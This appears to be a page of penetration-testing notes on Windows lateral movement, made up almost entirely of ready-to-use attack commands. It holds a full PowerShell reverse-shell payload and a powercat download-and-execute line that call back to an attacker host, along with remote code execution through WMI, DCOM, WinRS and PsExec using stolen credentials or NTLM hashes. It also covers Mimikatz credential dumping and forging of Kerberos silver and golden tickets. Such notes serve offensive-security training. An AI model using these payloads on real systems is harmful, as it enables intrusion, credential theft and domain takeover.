Lateral Movement

Via Reverse Shells

Oneliner reverse shell:

    $payload = '$client = New-Object System.Net.Sockets.TCPClient("<Kali IP>",<Listening Port>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'
    
    $encodedPayload = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($payload))

Powercat reverse shell:

    $payload = "IEX(New-Object System.Net.WebClient).DownloadString('http://<Kali IP>/powercat.ps1');powercat -c <Kali IP> -p <Listening Port> -e powershell"
    
    $encodedPayload = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($payload))

WMI

On the Victime Machine:
    wmic /node:<target IP> /user:<username> /password:<password> process call create "<payload>"

Execute payload
    Example - wmic /node:<IP> /user:<username> /password:<password> process call create "cmd"
    
    Example - $full_payload = "powershell -nop -w hidden -e $encodedPayload"
    Example - wmic /node:<IP> /user:<username> /password:<password> process call create "$full_payload"

Powershell

$username = "<username>";
$password = "<password>";
$secureString = ConvertTo-SecureString $password -AsPlainText -Force;
$credential = New-Object System.Management.Automation.PSCredential $username, $secureString;

$sessionOption = New-CimSessionOption -Protocol Dcom
$session = New-CimSession -ComputerName <IP> -Credential $credential -SessionOption $sessionOption

$full_payload = "powershell -nop -w hidden -e $encodedPayload"

Execute payload
    Invoke-CimMethod -CimSession $session -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine = $payload}
    
    OR
    
    New-PSSession -ComputerName <IP> -Credential $credential

WINRS

$full_payload = "powershell -nop -w hidden -e $encodedPayload"
winrs -r:<target IP/hostname> -u:<username> -p:<password> "$payload"

PsExec

On Kali machine:
    git clone https://github.com/davehardy20/sysinternals.git
        > Located in sysinterals/psexec64.exe
        > Transfer executable to the compromized machine

On Victim machine:
    psexec64.exe -i \\<target IP/hostname> -u <domain name>\<username> -p "<password>" "<payload>"

Passing the Hash

On Kali machine:
	impacket-wmiexec <username>@<target IP> -hashes :<user NTLM hash>
	proxychains impacket-wmiexec <username>@<target IP> -hashes :<user NTLM hash>

DCOM

1. Instantiate a remote MMC 2.0 application
	$dcom = [System.Activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application.1","<IP>"))

2. Start up a listener to catch reverse shells on our kali
	nc -nlvp 4444

3. Generate the payload, and 
	$full_payload = "powershell -nop -w hidden -e $encodedPayload"
	$dcom.Document.ActiveView.ExecuteShellCommand("<cmd | powershell>",$null,"$full_payload","7")

4. Return to the listener on our kali, we should receive a reverse shell coming from the target machine.

SSH private keys

ssh-keygen -t rsa
	# Used to generate a ssh keypair

ssh -i <private key> <username>@<IP>
ssh -i <private key> <username>@<IP> -o IdentitiesOnly=yes
	# Use when there are multiple private keys in the .ssh directory

Mimikatz

./mimikatz.exe
privilege::debug
	Identify target service user NTLM hash: sekurlsa::logonpasswords
	Identify krbtgt NTLM hash: lsadump::lsa /patch
	Get Domain SID: whoami /user

Overpass the Hash
	sekurlsa::pth /user:<username> /ntlm:<NTLM hash> /domain:<domain name> /run:<cmd | powershell>
	net use \\<target IP/hostname>
	./PsExec64.exe \\<target IP/hostname> <cmd | powershell>

Pass the Ticket
	sekurlsa::tickets /export
		# dir *.kirbi | findstr <username>
	kerberos::ptt <cifs.kirbi file name>
		# Attempt to access the resource as the current user, the authentication process will now make use of the newly injected TGT
	Example: ls \\<target IP/hostname>\<share name>
		iwr -UseDefaultCredentials http://<target IP/hostname>

Silver Ticket for specific service:
	kerberos::golden /rc4:<Target SPN NTLM Hash>  /sid:<Domain SID>  /domain:<domain name> /ptt /target:<Target SPN>  /service:<service protocol> /user:<authorized username>


Golden Ticket for all services:
	kerberos::golden /user:<username> /domain:<domain name> /sid:<domain SID> /krbtgt:<krbtgt NTLM hash> /ptt>

	Verify tickets with: klist

Creating Users

PreviousEnumeration NextPrivilege Escalation

Last updated 7 months ago